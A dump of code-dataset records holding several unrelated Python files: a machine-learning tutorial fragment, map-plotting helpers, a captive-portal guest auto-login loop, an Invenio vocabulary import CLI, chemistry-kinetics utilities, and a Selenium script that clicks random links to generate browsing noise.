y_train)\nx_test = lda.transform(x_test)\n\n# fitting logistic regression classification model to dataset\nclassifier = LogisticRegression(random_state = 0)\nclassifier.fit(x_train, y_train)\n\n# predicting test set results and calculating confusion matrix and accuracy\ny_pred = classifier.predict(x_test)\nc_m = confusion_matrix(y_test, y_pred)\naccuracy = accuracy_score(y_test, y_pred)\nprint(f'Accuracy is: {accuracy}')\n\n\n# visualizing training results\nx_set, y_set = x_train, y_train\nx_1, x_2 = np.meshgrid(np.arange(start = x_set[:,0].min() - 1, stop = x_set[:,0].max() + 1, step = 0.01), \\\n np.arange(start = x_set[:,1].min() - 1, stop = x_set[:,1].max() + 1, step = 0.01))\n\nplt.contourf(x_1, x_2, classifier.predict(np.array([x_1.ravel(),x_2.ravel()]).T).reshape(x_1.shape), alpha = 0.75, cmap = ListedColormap(('red','green','blue')))\nplt.xlim(x_1.min(),x_1.max())\nplt.ylim(x_2.min(),x_2.max())\nfor i,j in enumerate(np.unique(y_set)):\n plt.scatter(x_set[y_set==j,0],x_set[y_set==j,1], c = ListedColormap(('red','green','blue'))(i), label =j)\nplt.title('Logistic Regression (training results)')\nplt.xlabel('LD1')\nplt.ylabel('LD2')\nplt.legend()\nplt.show()\n\n\n\n# visualizing test results\nx_set, y_set = x_test, y_test\nx_1, x_2 = np.meshgrid(np.arange(start = x_set[:,0].min() - 1, stop = x_set[:,0].max() + 1, step = 0.01), \\\n np.arange(start = x_set[:,1].min() - 1, stop = x_set[:,1].max() + 1, step = 0.01))\n\nplt.contourf(x_1, x_2, classifier.predict(np.array([x_1.ravel(),x_2.ravel()]).T).reshape(x_1.shape), alpha = 0.75, cmap = ListedColormap(('red','green','blue')))\nplt.xlim(x_1.min(),x_1.max())\nplt.ylim(x_2.min(),x_2.max())\nfor i,j in enumerate(np.unique(y_set)):\n plt.scatter(x_set[y_set==j,0],x_set[y_set==j,1], c = ListedColormap(('red','green','blue'))(i), label =j)\nplt.title('Logistic Regression (test results)')\nplt.xlabel('LD1')\nplt.ylabel('LD2')\nplt.legend()\nplt.show()\n", "sub_path": "coding/part9_dimensionality_reduction/lda/lda.py", "file_name": "lda.py", "file_ext": "py", "file_size_in_byte": 3022, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 26, "usage_type": "call"}, {"api_name": 
"sklearn.preprocessing.StandardScaler", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.discriminant_analysis.LinearDiscriminantAnalysis", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": 
"matplotlib.colors.ListedColormap", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}]}
+{"seq_id": "321422704", "text": "\"\"\"Inspiration:\nhttps://github.com/tommylees112/esowc_notes/blob/master/src/plotting_utils.py\n\"\"\"\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport shapely\n\nfrom scipy import stats\nfrom scipy.stats import pearsonr\n\nimport matplotlib.pyplot as plt\n\nimport cartopy\nfrom cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\n\ndef plot_xarray_on_globe(da, borders=True, coastlines=True, **kwargs):\n \"\"\" Plot the LOCATION of an xarray object \"\"\"\n # get the center points for the maps\n mid_lat = np.mean(da.lat.values)\n mid_lon = np.mean(da.lon.values)\n # create the base layer\n fig = plt.figure(figsize=(12, 8))\n ax = fig.add_subplot(1, 1, 1, projection=cartopy.crs.Orthographic(mid_lon, mid_lat))\n # ax = plt.axes(projection=cartopy.crs.Orthographic(mid_lon, mid_lat))\n\n vmin = kwargs.pop(\"vmin\", None)\n vmax = kwargs.pop(\"vmax\", None)\n cmap = kwargs.pop(\"cmap\", None)\n da.plot(ax=ax, transform=cartopy.crs.PlateCarree(), vmin=vmin, vmax=vmax, cmap=cmap)\n\n ax.coastlines()\n ax.add_feature(cartopy.feature.BORDERS, linestyle=\":\")\n ax.add_feature(cartopy.feature.LAKES, facecolor=None)\n fig = plt.gcf()\n ax.outline_patch.set_visible(False)\n return fig, ax\n\n\ndef plot_xarray_on_map(da, borders=True, coastlines=True, **kwargs):\n \"\"\" Plot the LOCATION of an xarray object \"\"\"\n\n # create the base layer\n fig = plt.figure(figsize=(12, 8))\n ax = fig.add_subplot(1, 1, 1, projection=cartopy.crs.Robinson())\n # ax = plt.axes(projection=cartopy.crs.Orthographic(mid_lon, mid_lat))\n\n vmin = kwargs.pop(\"vmin\", None)\n vmax = kwargs.pop(\"vmax\", None)\n cmap = kwargs.pop(\"cmap\", None)\n robust = kwargs.pop(\"robust\", None)\n da.plot(\n ax=ax,\n transform=cartopy.crs.PlateCarree(),\n vmin=vmin,\n vmax=vmax,\n cmap=cmap,\n robust=robust,\n cbar_kwargs={\"shrink\": 0.4},\n )\n\n ax.coastlines()\n ax.add_feature(cartopy.feature.BORDERS, linestyle=\":\")\n ax.add_feature(cartopy.feature.LAKES, facecolor=None)\n fig = plt.gcf()\n ax.outline_patch.set_visible(False)\n return fig, ax\n\n\ndef add_point_location_to_map(point, ax, color=(0, 0, 0, 1), **kwargs):\n \"\"\" \"\"\"\n assert isinstance(\n point, shapely.geometry.point.Point\n ), f\"point should be of type shapely.geometry.point.Point. Currently: {type(point)}\"\n # assert isinstance(ax, cartopy.mpl.geoaxes.GeoAxesSubplot), f\"Axes need to be cartopy.mpl.geoaxes.GeoAxesSubplot. Currently: {type(ax)}\"\n ax.scatter(\n point.x, point.y, transform=cartopy.crs.PlateCarree(), c=[color], **kwargs\n )\n\n return\n\n\ndef add_points_to_map(ax, geodf, point_colors=\"#0037ff\"):\n \"\"\" Add the point data stored in `geodf.geometry` as points to ax\n Arguments:\n ---------\n : geodf (geopandas.GeoDataFrame)\n gpd.GeoDataFrame with a `geometry` column containing shapely.Point geoms\n : ax (cartopy.mpl.geoaxes.GeoAxesSubplot)\n \"\"\"\n assert isinstance(\n ax, cartopy.mpl.geoaxes.GeoAxesSubplot\n ), f\"Axes need to be cartopy.mpl.geoaxes.GeoAxesSubplot. 
Currently: {type(ax)}\"\n points = geodf.geometry.values\n\n # [add_point_location_to_map(point, ax, color=\"0037ff\") for point in points]\n ax.scatter(\n [point.x for point in points],\n [point.y for point in points],\n transform=cartopy.crs.PlateCarree(),\n color=point_colors,\n )\n\n return ax\n", "sub_path": "esdc/visualize.py", "file_name": "visualize.py", "file_ext": "py", "file_size_in_byte": 3494, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.mean", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "cartopy.crs.Orthographic", "line_number": 28, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 34, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cartopy.feature", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cartopy.feature", "line_number": 38, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "cartopy.crs.Robinson", "line_number": 49, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 58, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cartopy.feature", "line_number": 67, "usage_type": "attribute"}, {"api_name": "cartopy.feature", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "shapely.geometry", "line_number": 77, "usage_type": "attribute"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 81, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 81, "usage_type": "attribute"}, {"api_name": "cartopy.mpl", "line_number": 96, "usage_type": "attribute"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 104, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 104, "usage_type": "attribute"}]}
+{"seq_id": "553559738", "text": "import time\r\nimport requests\r\n\r\n# Цикл проверки и авторизации сети\r\nwhile True:\r\n # Проверка подключения к сети\r\n try:\r\n r = requests.get('http://172.30.0.36:8000/')\r\n except:\r\n print('Подключитесь к сети')\r\n time.sleep(120)\r\n continue\r\n # Проверка авторизации в сети\r\n try:\r\n auto = requests.get('https://www.google.ru/?hl=ru')\r\n if auto.status_code == requests.codes.ok:\r\n print('Вы авторизированы !')\r\n # Авторизация в сети\r\n except:\r\n print('Отправка POST-запроса')\r\n data = {\r\n 'user': 'Guest',\r\n 'password': ''\r\n }\r\n requests.post('http://172.30.0.36:8000/api/captiveportal/access/logon/0/', data=data)", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 16, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "223713797", "text": "# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2020-2021 CERN.\n# Copyright (C) 2021 Graz University of Technology.\n#\n# Invenio-Vocabularies is free software; you can redistribute it and/or\n# modify it under the terms of the MIT License; see LICENSE file for more\n# details.\n\n\"\"\"Commands to create and manage vocabulary.\"\"\"\n\nimport csv\nfrom os.path import dirname, join\n\nimport click\nfrom flask.cli import with_appcontext\nfrom flask_principal import Identity\nfrom invenio_access import any_user\nfrom invenio_db import db\n\nfrom invenio_vocabularies.contrib.subjects.subjects import subject_record_type\nfrom invenio_vocabularies.records.models import VocabularyType\nfrom invenio_vocabularies.services.service import VocabulariesService\n\ndata_directory = join(dirname(__file__), \"data\")\n\n\ndef get_available_vocabularies():\n \"\"\"Specify the available vocabularies.\"\"\"\n return {\n \"licenses\": {\n \"path\": join(data_directory, \"licenses.csv\"),\n },\n \"subjects\": {\n \"path\": join(data_directory, \"subjects.csv\"),\n \"specific\": _create_subjects_vocabulary,\n },\n }\n\n\ndef _load_csv_data(path):\n with open(path) as f:\n reader = csv.DictReader(f, skipinitialspace=True)\n dicts = [row for row in reader]\n return dicts\n\n\ndef _create_subjects_vocabulary(vocabulary_type_name, source_path):\n identity = Identity(1)\n identity.provides.add(any_user)\n service = subject_record_type.service_cls()\n\n rows = _load_csv_data(source_path)\n\n records = []\n for row in rows:\n metadata = {\n \"title\": row[\"title\"],\n \"term\": row[\"id\"],\n \"identifier\": row[\"id\"],\n \"scheme\": row[\"scheme\"],\n }\n\n record = service.create(\n identity=identity,\n data={\n \"metadata\": metadata,\n },\n )\n\n records.append(record)\n\n return records\n\n\ndef _create_vocabulary(vocabulary_type_name, source_path):\n identity = Identity(1)\n identity.provides.add(any_user)\n service = VocabulariesService()\n\n # Load data\n rows = _load_csv_data(source_path)\n\n # Create vocabulary type\n vocabulary_type = VocabularyType(name=vocabulary_type_name)\n db.session.add(vocabulary_type)\n db.session.commit()\n\n i18n = [\"title\", \"description\"] # Attributes with i18n support\n other = [\"icon\"] # Other top-level attributes\n\n default_language = \"en\" # Static (dependent on the files)\n\n metadata = {\"title\": {}, \"description\": {}, \"props\": {}}\n\n records = []\n for row in rows:\n for attribute in row:\n value = row[attribute]\n if attribute in i18n:\n metadata[attribute][default_language] = value\n elif any(map(lambda s: value.startswith(s + \"_\"), i18n)):\n [prefix_attr, language] = attribute.split(\"_\", 1)\n metadata[prefix_attr][language] = value\n elif attribute in other:\n metadata[attribute] = value\n else:\n metadata[\"props\"][attribute] = value\n\n # Create record\n record = service.create(\n identity=identity,\n data={\n \"metadata\": metadata,\n \"vocabulary_type_id\": vocabulary_type.id,\n },\n )\n\n records.append(record)\n\n return records\n\n\n@click.group()\ndef vocabularies():\n \"\"\"Vocabularies command.\"\"\"\n pass\n\n\n@vocabularies.command(name=\"import\")\n@click.argument(\n \"vocabulary_types\",\n nargs=-1,\n type=click.Choice([v for v in get_available_vocabularies()]),\n)\n@with_appcontext\ndef load(vocabulary_types):\n \"\"\"Index CSV-based vocabularies in Elasticsearch.\"\"\"\n click.echo(\"creating vocabularies...\", color=\"blue\")\n\n for vocabulary_type in vocabulary_types:\n vocabulary = 
get_available_vocabularies()[vocabulary_type]\n if VocabularyType.query.filter_by(name=vocabulary_type).count() > 0:\n click.echo(\n \"vocabulary type {} already exists, skipping\".format(\n vocabulary_type\n ),\n color=\"red\",\n )\n continue\n\n click.echo(\n \"creating vocabulary type {}...\".format(vocabulary_type),\n color=\"blue\",\n )\n\n fun_create_vocabulary = vocabulary.get(\"specific\", _create_vocabulary)\n items = fun_create_vocabulary(vocabulary_type, vocabulary[\"path\"])\n\n click.echo(\n \"created {} vocabulary items successfully\".format(len(items)),\n color=\"green\",\n )\n click.echo(\"vocabularies created\", color=\"green\")\n", "sub_path": "invenio_vocabularies/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 4629, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 43, "usage_type": "call"}, {"api_name": "flask_principal.Identity", "line_number": 49, "usage_type": "call"}, {"api_name": "invenio_access.any_user", "line_number": 50, "usage_type": "argument"}, {"api_name": "invenio_vocabularies.contrib.subjects.subjects.subject_record_type.service_cls", "line_number": 51, "usage_type": "call"}, {"api_name": "invenio_vocabularies.contrib.subjects.subjects.subject_record_type", "line_number": 51, "usage_type": "name"}, {"api_name": "flask_principal.Identity", "line_number": 77, "usage_type": "call"}, {"api_name": "invenio_access.any_user", "line_number": 78, "usage_type": "argument"}, {"api_name": "invenio_vocabularies.services.service.VocabulariesService", "line_number": 79, "usage_type": "call"}, {"api_name": "invenio_vocabularies.records.models.VocabularyType", "line_number": 85, "usage_type": "call"}, {"api_name": "invenio_db.db.session.add", "line_number": 86, "usage_type": "call"}, {"api_name": "invenio_db.db.session", "line_number": 86, "usage_type": "attribute"}, {"api_name": "invenio_db.db", "line_number": 86, "usage_type": "name"}, {"api_name": "invenio_db.db.session.commit", "line_number": 87, "usage_type": "call"}, {"api_name": "invenio_db.db.session", "line_number": 87, "usage_type": "attribute"}, {"api_name": "invenio_db.db", "line_number": 87, "usage_type": "name"}, {"api_name": "click.group", "line_number": 124, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 139, "usage_type": "call"}, {"api_name": "invenio_vocabularies.records.models.VocabularyType.query.filter_by", "line_number": 143, "usage_type": "call"}, {"api_name": "invenio_vocabularies.records.models.VocabularyType.query", "line_number": 143, "usage_type": "attribute"}, {"api_name": "invenio_vocabularies.records.models.VocabularyType", "line_number": 143, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 144, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 152, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 160, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 164, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 131, "usage_type": "call"}, {"api_name": "click.Choice", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.cli.with_appcontext", "line_number": 136, "usage_type": 
"name"}]}
+{"seq_id": "653687015", "text": "\"\"\"\nt3 common module\n\"\"\"\n\nimport datetime\nimport os\nimport string\nfrom typing import Optional, Tuple\n\nfrom rmgpy.species import Species\n\nfrom arc.species.converter import molecules_from_xyz\n\nVERSION = '0.1.0'\n\nt3_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) # absolute path to the T3 folder\nDATA_BASE_PATH = os.path.join(t3_path, 'tests', 'data')\nSIMULATE_DATA_BASE_PATH = os.path.join(t3_path, 'tests', 'test_simulate_adapters', 'data')\nEXAMPLES_BASE_PATH = os.path.join(t3_path, 'examples')\nIPYTHON_SIMULATOR_EXAMPLES_PATH = os.path.join(t3_path, 'ipython', 'simulator_adapter_examples')\nPROJECTS_BASE_PATH = os.path.join(t3_path, 'Projects')\nVALID_CHARS = \"-_=.,%s%s\" % (string.ascii_letters, string.digits)\n\n\ndef get_species_by_label(label: str,\n species_list: list,\n ) -> Optional[Species]:\n \"\"\"\n Get a species from a list of species by its label.\n\n Args:\n label (str): A species label.\n species_list (list): Entries are RMG Species objects.\n\n Returns:\n Optional[Species]: The corresponding species from the species_list.\n Returns ``None`` if no species was found.\n \"\"\"\n for species in species_list:\n if species.label == label or species.to_chemkin() == label:\n return species\n if '(' in label and ')' in label:\n # try by the RMG species index\n for species in species_list:\n if species.index == int(label.split('(')[-1].split(')')[0]):\n return species\n return None\n\n\ndef dict_to_str(dictionary: dict,\n level: int = 0,\n ) -> str:\n \"\"\"\n A helper function to log dictionaries in a pretty way.\n\n Args:\n dictionary (dict): A general python dictionary.\n level (int): A recursion level counter, sets the visual indentation.\n\n Returns:\n str: A text representation for the dictionary.\n \"\"\"\n message = ''\n for key, value in dictionary.items():\n if isinstance(value, dict):\n message += ' ' * level * 2 + str(key) + ':\\n' + dict_to_str(value, level + 1)\n else:\n message += ' ' * level * 2 + str(key) + ': ' + str(value) + '\\n'\n return message\n\n\ndef delete_root_rmg_log(project_directory: str) -> None:\n \"\"\"\n Delete the 'RMG.log' file left in the root output directory, it's a left-over.\n\n Args:\n project_directory (str): The path to the root output folder.\n \"\"\"\n rmg_log_path = os.path.join(project_directory, 'RMG.log')\n if os.path.isfile(rmg_log_path):\n os.remove(rmg_log_path)\n\n\ndef get_rmg_species_from_a_species_dict(species_dict: dict,\n raise_error: bool = False,\n ) -> Optional[Species]:\n \"\"\"\n Get an RMG Species instance that corresponds to a species specified under the rmg.species\n section of the T3 input file (a species dictionary).\n\n Args:\n species_dict (dict): The species dictionary to process.\n raise_error (bool, optional): Whether to raise an error if a Species instance cannot be generated.\n Default: ``False``.\n\n Raises:\n ValueError: If the species dictionary does not have a specified structure (if ``raise_error`` is ``True``).\n\n Returns:\n Species: The corresponding RMG species instance.\n \"\"\"\n species = None\n errored = False\n if species_dict['adjlist'] is not None:\n species = Species(label=species_dict['label']).from_adjacency_list(species_dict['adjlist'])\n elif species_dict['smiles'] is not None:\n species = Species(label=species_dict['label'], smiles=species_dict['smiles'])\n elif species_dict['inchi'] is not None:\n species = Species(label=species_dict['label'], inchi=species_dict['inchi'])\n elif species_dict['xyz'] is not None:\n 
for xyz in species_dict['xyz']:\n mol_bo = molecules_from_xyz(xyz=xyz)[1]\n if mol_bo is not None:\n species = Species(label=species_dict['label']).from_adjacency_list(mol_bo.to_adjacency_list())\n break\n else:\n errored = True\n else:\n errored = True\n if errored and raise_error:\n raise ValueError(f\"The species corresponding to {species_dict['label']} does not have a specified structure.\")\n return species\n\n\ndef time_lapse(t0: datetime.datetime) -> datetime.timedelta:\n \"\"\"\n A helper function returning the elapsed time since t0.\n\n Args:\n t0 (datetime.datetime): The initial time the count starts from.\n\n Returns: datetime.timedelta\n The time difference between now and t0.\n \"\"\"\n return datetime.datetime.now() - t0\n\n\ndef convert_termination_time_to_seconds(termination_time: Tuple[float, str]):\n \"\"\"\n Converts the termination_time tuple from the RMG reactor to seconds.\n This is necessary for the RMS adapters since the Julia solver expects\n the integration bounds to be in units of seconds.\n\n Args:\n termination_time (Tuple[float, str]): Termination time for simulating in the RMG reactor. Example: [5, 'hours']\n\n Returns:\n t_final (float): The termination time in seconds.\n \"\"\"\n unit_conversion = {'micro-s': 1e-6,\n 'ms': 1e-3,\n 's': 1,\n 'hrs': 3600,\n 'hours': 3600,\n 'days': 3600*24,\n }\n t_final, units = termination_time\n t_final = t_final * unit_conversion[units]\n return t_final\n", "sub_path": "t3/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 5596, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.abspath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "string.ascii_letters", "line_number": 22, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 22, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 27, "usage_type": "name"}, {"api_name": "rmgpy.species.Species", "line_number": 27, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 81, "usage_type": "call"}, {"api_name": "rmgpy.species.Species", "line_number": 105, "usage_type": "call"}, {"api_name": "rmgpy.species.Species", "line_number": 107, "usage_type": "call"}, {"api_name": "rmgpy.species.Species", "line_number": 109, "usage_type": "call"}, {"api_name": 
"arc.species.converter.molecules_from_xyz", "line_number": 112, "usage_type": "call"}, {"api_name": "rmgpy.species.Species", "line_number": 114, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 86, "usage_type": "name"}, {"api_name": "rmgpy.species.Species", "line_number": 86, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 135, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 125, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 138, "usage_type": "name"}]}
+{"seq_id": "598440415", "text": "import time\nfrom random import randint, uniform\nfrom selenium import webdriver\nfrom itertools import repeat\n\n# Add odd shit here\nsite_list = [\"yahoo.com\"]\n\ndef site_select():\n i = randint(0, len(site_list) - 1)\n return (site_list[i])\n\nfirefox_profile = webdriver.FirefoxProfile()\nfirefox_profile.set_preference(\"browser.privatebrowsing.autostart\", True)\ndriver = webdriver.Firefox(firefox_profile=firefox_profile)\n\n# Visits a site, clicks a random number links, sleeps for random spans between\ndef visit_site():\n new_site = site_select()\n driver.get(new_site)\n print(\"Visiting: \" + new_site)\n time.sleep(uniform(1, 15))\n\n for i in repeat(None, randint(1, 3)) :\n try:\n links = driver.find_elements_by_css_selector('a')\n l = links[randint(0, len(links)-1)]\n time.sleep(1)\n print(\"clicking link\")\n l.click()\n time.sleep(uniform(0, 120))\n except Exception as e:\n print(\"Something went wrong with the link click.\")\n print(type(e))\n\nwhile(True):\n visit_site()\n time.sleep(uniform(4, 80))\n", "sub_path": "dirty_data.py", "file_name": "dirty_data.py", "file_ext": "py", "file_size_in_byte": 1111, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "random.randint", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver.FirefoxProfile", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 22, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 31, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 38, "usage_type": "call"}]}
